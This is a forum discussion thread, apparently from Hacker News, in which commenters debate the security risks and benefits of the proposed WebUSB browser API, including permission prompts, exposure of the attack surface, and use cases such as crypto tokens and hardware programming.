I'm not sure how you can compare the rollout of a native application to all user computers versus publishing within an intranet. They are not even in the same league in terms of deployment. Intranet is far, far easier. The native application has to be pushed out, installed and verified. A web app simply has to have its link emailed to users. Hell you could even push out a bookmark over many IT management systems (which is far easier than dealing with pushing out an application).
So I see a lot of negative comments about the security implications of this. Presuming that the browser gates access to USB devices in the same way it gates access to geolocation, what's the risk here? How is it different than installing 3rd party software on your OS?
I've read about the "inner platform" effect, and I don't know. I'm just not convinced it's a bad thing here. For all its warts, the web is far and away the best cross platform application delivery system. Use this in conjunction with things like IPFS and browser based persistent storage, and can run signed versions of trusted, auditable code that can do lots of awesome stuff. Without users having to futz with installers.
>How is it different than installing 3rd party software on your OS?
The whole act of downloading and installing?
For desktop apps, you have to do that.
For webapps, you just have to visit a page (or even not, thanks to XSS).
And while we install 2-5 or maybe 20 apps per year (at most, some don't install anything after they get their PCs), we visit 100s of pages each day, and 1000s each month.
Also, while we can realistically restrict our app downloads to legitimate sources (the App Store, the product's webpage etc), we read stuff from all over the place -- that's what links are there for.
I'd like to know too, because I just can't accept that the answer to security issues is just "Don't do that"...
It really looks like they are doing this right. Fully behind permissions that are already protected against clickjacking, very limited scope, requires HTTPS, and is being implemented with security as a first priority.
People are acting like access to USB is something that no PC should ever do...
At the moment, nothing in a browser is direct access. Everything is abstracted, which includes the filesystem and geolocation. This provides a layer of security against massive horrible bugs in the OS. With WebUSB there seems to be very little abstracting, all the values you pass to it are then sent on to the device. Small bugs once protected by numerous layers of security usually requiring superuser abilities are now made massive as they are connected to one of the largest fuzzers there is, the internet.
Presuming that the browser gates access to USB devices in the same way it gates access to geolocation, what's the risk here? How is it different than installing 3rd party software on your OS?
Except that most people will easily dismiss the "are you sure" warnings to the point that I could see browser developers eventually defaulting that to enabled and not asking ("it's for better UX!")
The desktop is unfortunately moving in a similar direction (witness all the telemetry in Windows 10, etc.) but there at least seems to be a greater notion of user control than with what browsers are turning into.
Are there any examples of that happening on the web yet? All browser vendors agree that most of these new features need to be behind explicit permissions.
Hell people are still complaining about full screen permissions pop-ups and no browser has gotten rid of them yet because they know the problems that could come from it.
If anything there is a push to go the other direction, making previously "enabled by default" things behind permissions.
You're right that they're (ostensibly) placing emphasis on permissions at the moment, but I don't see that staying the same if websites start adopting and using these features in any quantity.
> Are there any examples of that happening on the web yet? All browser vendors agree that most of these new features need to be behind explicit permissions.
Well, WebRTC is enabled by default. Exposes your real IP, and allows anyone to portscan your whole LAN.
WebRTC never had permissions so that's not an example of a feature that had its permissions removed after a time.
And that was actually the feature I had in mind in my last paragraph. There is a pretty big push to put it behind a permissions window (at least for local network access).
Why was something like this ever implemented without permissions anyway?
If such a big mistake is made – releasing info about devices in the LAN, de-anonymizing people, and releasing location data – then what mistakes will be made with WebUSB or WebFilesystemAccess?
I seriously don’t want anything to ever have access to anything unless I grant it.
There’s a reason UNIX has no execute permissions by default for files, and a reason why I use SELinux.
This whole browser shit destroys the whole security model.
Many consider it a mistake (I sure as hell do), hence everything else being behind a permissions model.
I could ask you why SELinux is necessary in the first place, but the fact is that mistakes are made and learned from, and additional software is made to fill in the gaps.
If you want that amount of control, there are plugins that grant it, and using a plugin is much like using SELinux to fill in gaps or mistakes in the platform.
Software will never be bug free, and that's not an excuse to never write anymore software.
That's a massive strawman. You might as well argue that browser vendors will eventually default to allowing programs to be installed without user intervention.
Look at WebRTC for an example. Despite having zero convincing scenarios where silent P2P data channels that discard your explicit networking (proxy) settings, that's turned on in all browsers.
Fun conversation: I asked someone involved with WebRTC for a real, non-video example, and they honestly suggested "maybe your browser wants to talk to your fridge and would benefit from data channel encryption". So far out of touch with reality.
Wouldn't surprise me in the least if, for instance, this ends up allowing enumeration by default or something else.
The difference is that we don't allow websites to install third party software on your OS just by convincing the user to click yes on a dialog box - not anymore, not after what happened with ActiveX. Also, it's probably not obvious to most users that giving a website access to an innocent-looking USB device is in fact equivalent to giving it full access to their PC.
`First, so that the device can protect itself from malicious sites it can provide a set of origins that are allowed to connect to it.`
Sounds kinda DRM-ey. The CORS system works because the owner of a URL is the person who can attach headers to responses. That doesn't sound the same in this case, as the owner of a device is the person who owns it, not the manufacturer who decides what metadata it broadcasts (though obviously working out what the UX should be is a hard problem)
This particular restriction is intended to address things like authentication devices (e.g. gnubby) where you basically destroy the entire security model if a user accidentally allows a malicious website to connect to it.
That stated, the last round of discussions gave me the impression that browsers generally (and in particular Chrome) are leaning towards implementing this as a very alerting warning rather than an outright block.
It would be nice if this spec would be implemented in major browsers allowing access from JavaScript to USB crypto tokens.
In my country (and, AFAIK, in many other places) those tokens are used to provide some government services which require digital signature. Few years ago Java applets were widely used to provide that functionality. There's no other way for JavaScript to access crypto token. It wasn't that smooth, but it worked. Now, when Java applets started to disappear in major browsers, websites require you to download a program which must be run, it listens at local port and website uses websocket to communicate with that program. This process becomes much more complicated for user, especially for non-Windows OS.
If JavaScript would be able to access USB crypto device, the whole user experience improvement would be huge.
This is actually pretty exciting. I can see being able to plug in to an arbitrary computer and visit https://www.yourdevicemanufacturer.com/ to manage your personal devices really taking off. No drivers or shitty apps to install or update? This will be huge.
I can see why people would be concerned about attack surface, but if you're plugging your devices in to foreign USB ports, then you're potentially 0wned already. At least this way, if it's done right with regard to permissions, the driver side will always be up to date. Plus Javascript is memory-safe.
Holy freakin ghost though, this should be HTTPS only.
The problem is that every website you give USB access to can keylog anything you type. Nobody here cares about foreign ports or whatever.
I can already use all my three USB devices (mouse, keyboard, flash drive) in conjunction with websites. Where is the supposed utility? Beyond some niches like connecting an arduino and a gamepad I can't see this being useful.
Standard device classes include keyboard, mice, audio, video and storage devices. Operating systems support such devices using the "class driver" provided by the OS vendor. There is however a long tail of devices that do not fit into one of the standardized device classes. These devices require hardware vendors to write native drivers and SDKs in order for developers to take advantage of them and this native code prevents these devices from being used by the web.
Read the spec. It doesn't grant access to your USB devices directly. It's an abstraction layer gated similar to how geolocation works and the vendor supplies how much of the device the web browser can touch. It's actually pretty clever.
Though I agree with the concerns about security, I can personally think of a cool use-case: http://knightos.org. It'd be nice if users could just plug in a calculator and install KnightOS on it from any web browser. Ditto with https://packages.knightos.org - plug in calculator and click a button to install the package.
This is what happens when the generation that brought us front ends that require 450MB of memory to display a web page start aging and join committees.
This trend of shoving as much functionality into browsers as possible is really worrying. It's indicative of lazy architecting, because most of the time the complex features you desire are fully available using native OS APIs. There does not need to be a bridge for every feature in the browser. For apps using OS level APIs, more often than not, users will need to grant some permission to access their device. The permission scopes in modern operating systems are very strict and hardened. It would be very difficult for an app to execute a "drive by" exploit without first requesting some form of permission. At the very least, the user needs to explicitly download the app into their device (as opposed to simply viewing a webpage). The permissions API of browsers, compared to OS, are less mature, operate in userspace, and are inherently less secure.
If an exploit exists in the browser, suddenly every device with that browser becomes vulnerable to a drive by exploit, as opposed to every device that downloaded a single malicious app. The user may be completely unaware, because there is no download confirmation or permission granting involved in viewing a webpage (assuming the exploit bypasses the weak permissions API of the browser). A malicious actor could load the exploit into an iframe via an ad network and the user would have no idea.
A lot of points about the dangers of exposing a USB device to the internet. I'm concerned about a future where all my USB devices require internet access. Is network chatter destined to increase until nothing we own will function without phoning home? It's a firewall headache.
> A lot of points about the dangers of exposing a USB device to the internet.
It gets exposed to the web browser, not the internet. They can become accessible via a usb:// protocol and use JavaScript for interaction. They gain no low level access.
> I'm concerned about a future where all my USB devices require internet access.
Many people on HN are worried about this though why mention it in a comment on this article? Did you read it? It exposes the USB devices to the web browser through an API that has parts similar to CORS. You'll be able to take a usb device and interface with it using an offline, HTML5, web application.
The things you want to omit have nothing to do with Servo is the point of my comment. Servo's modularity is irrelevant to removing webcam access. Which incidentally I believe you can already do in both Firefox and Chrome by disabling the MediaSource API altogether.
Servo isn't strictly just the HTML+CSS part, if you have a look at the project's sources.
Modularity is relevant because if stuff isn't modular and has code paths to deal with missing functionality, you'll have a much increased burden, aka a fork.
In Firefox (and maybe Chrome, don't use, so not sure) you can disable it in the configuration but that could easily be enabled again by some script or extension.
If implemented right this could be fantastic, especially for devices like Chromebooks, but am I reading it right that this API basically brings hardware drivers to JavaScript?
* Nodebots - http://nodebots.io/ for controlling a multitude of hardware via node.JS through bluetooth, BLE, or USB/Serial (which most hacker level hardware still prefers).
Ideally the world would converge to a single unified implementation, that said there is a lot of differences between USB-serialport, USB-HID, and a multitude of other communication methods over USB.
TL;DR you can do hardware with JS already, this should make things in the browsers slightly easier (one less dependency) at the risk of making it available for all things.
You'll find that most USB drivers do very little beyond moving bytes from one place to another, so it's kind of a natural fit because it can enable a lot of convenience for end users. (Think kids trying to program their Arduino, or a web-based GUI for your ham radio... things like that.)
It would be more natural to add a new IP-over-USB device class and let products opt in to bring an IoT experience without invading the entire legacy stack and exposing all its security holes.
Nothing says "I love you" more than malware persistently embedded in your USB devices.
Here's how hardware teams work (in my experience)
----
Manager: "Hmmm... we need firmware. Hey, who can update the USB stack for the next version of our USB toaster?"
Team: shrug
Manager: "Figby! Don't you do Arduino stuff on the weekends? You do it. Be done next Friday."
Figby: "Meep?"
USB is hard enough to get working properly, now you need to add "resistance to attack from the host" to the feature set. Figby is in trouble because he's being crushed under four rocks now:
1. USB is hard to get working. The standard is pretty complicated, and speaking frankly here, the device class standards are pretty badly fucked up. Camel-by-committee class bad. You spend a lot of time getting edge cases to work. (Don't get me started on DFU, OMFG).
2. Figby probably has a bunch of legacy to deal with. If the USB stack he's working with started from a fine commercial framework, he's better off. But he's likely working with something horrible hatched by a former semi-hardware guy a while ago, who was fired because six months into the prior version of the project, management finally realized he could barely spell 'C'. Oh, and the code makes liberal use of #define, and the source doesn't use curly braces, but DO..OD and WHILE..ELIHW, and there is deep, deep misunderstanding of what 'volatile' actually does.
3. Figby also has to work with the host driver team. If they are not actively hiding from the hardware team they are either on the wrong side of the planet, or have absolutely no time to devote to USB issues. The new driver will arrive about three days after Fibgy's "golden master" date.
4. Figby has no time. Everything is feature work. If there are security bugs in the code (... and there are) they have been ignored or deferred as "won't fix" for several product versions. If there are security reviews, they are cursory check-off meetings where people who don't know anything about security make collective shrugs around bugs that are embedded in the product at the level of DNA. The code is swiss-cheese and would take months to make a dent in. Besides, this is a hardware company; isn't the OS supposed to keep us safe?
... now this WebUSB thing lands on Figby's plate. "Marketing really really wants this feature so they can add another checkbox to the package." What are the chances that Figby's going to fix security issues in the product before just turning the thing on for the whole internet to see? Because Friday.
Figby adds command handlers and descriptors for WebUSB. He'll get to the security stuff later, when the rest of everything else works.
Promoting the Browser to the OS level!? Read-only for private key loading may be useful but beyond that seems dangerous. Use standard download and save method.
Android and iOS apps tend to require "explicit" user permissions when installing them. I quote explicit, because it's really implicit: accept these terms or don't use the app.
How many people actually look at these before clicking install?
They're not fine grained enough to allow the user to weigh up the security implications of them, which leads to apps requesting every permission under the sun, or just outright refusal to use the app (by a small minority who know the script).
We can see how this will pan out in the browser: The browsers will initially offer the "allowed devices" set that is described here, but eventually users will find it "too confusing", and they'll reduce it to "Do you want to allow this website to access any USB device?"
The common user will get fed up of this popup appearing and the browser vendors will happily oblige by having an enabled-by-default option: "Allow websites to access my USB devices".
Then some giants (ie, google) will provide SaaSS to filter which devices can be accessed from which websites for you. Browser vendors will be quick to use this service, turned on by default, much the same way as they use google for anti-phishing and whatnot now without asking the user.
Yet another browser aperture that will require the usual multitude of post-implementation band-aid security fixes.
Sigh.
We get it.
We could make the browser the OS.
But should we? Not, could we?
I actually miss the days where the browser would be an application to view and consume content, with a modicum of scripting to progressively enhance the experience.
Why shouldn't we? Security on the browser level is actually stricter than that at the OS level most of the time. Any app you download from any random place and run can access your webcam - but a webapp has to request it.
I don't think the web makes Trojans or security flaws any more likely, it just changes where they sit. For the OS you've got buffer overflows which have been common for years and bash injection vulnerabilities.
The issue is if someone can break out of the sandbox. I think it's perfectly acceptable to make a web technology that can be the OS. I don't see any reason that such progress should be halted.
The browser was an application to view and consume content. Basically a book reader where you could access thousands of books just by putting in the right URL to the book.
Now it's the same thing but for applications. For features, functionality. With the right standards it's cross-platform - write once run anywhere. With improving specs and browser vendors caring about speed and UX it can begin to reach the same speeds anything "native" could.
I don't think the security risks outweigh the benefits, and even with those risks we can work hard to mitigate them.
The reason people are making the browser the OS is because there's money in it. Ad money, SaaS money, middleman money.
People whose computers already do useful things, for free, will obviously think that moving everything into the browser is stupid. But if you look at it from the perspective of the profit-driven companies and people pushing for it, the motivation is reasonable, if evil.
The reason I want to make the browser the OS is accessibility. Every other platform requires limiting your audience to a certain kind of person, usually drawn fairly close to class lines. I like software that's easily accessible anyone interested, with a minimum fuss from a usability perspective. The web is the only platform that matches that description.
Its big limitation is hardware access, so things like WebUSB, WebRTC, etc are great in my book.
As a blind person, I'll be the first to tell you that a vast majority of web technologies are built with accessibility as an afterthought at most. Just about when we've figured out how to make good accessible native apps, everything's going into the browser and it's a giant mess. Ugh.
I mean accessibility in a much broader sense than just hearing and vision impaired.
That said, your point is fully valid. The web is a wild untamed place, and without gatekeepers there is no one to impose rules that help people like you.
I think we will overcome that with upcoming toolkits, particularly conversational UI toolkits, but... Well, point taken. :)
It took years to put band-aid security measures onto a standard that initially allowed random websites to dump your VRAM contents and/or remotely exploit kernel-layer video driver bugs.
And graphics drivers/hardware are a much easier to control market than USB devices. You have five or six GPU vendors to yell at and/or blacklist broken driver versions, and tens of thousands of USB vendors.
If you're implementing this... please stop. This will cause serious problems. There is no reason whatsoever to allow remote access to USB devices.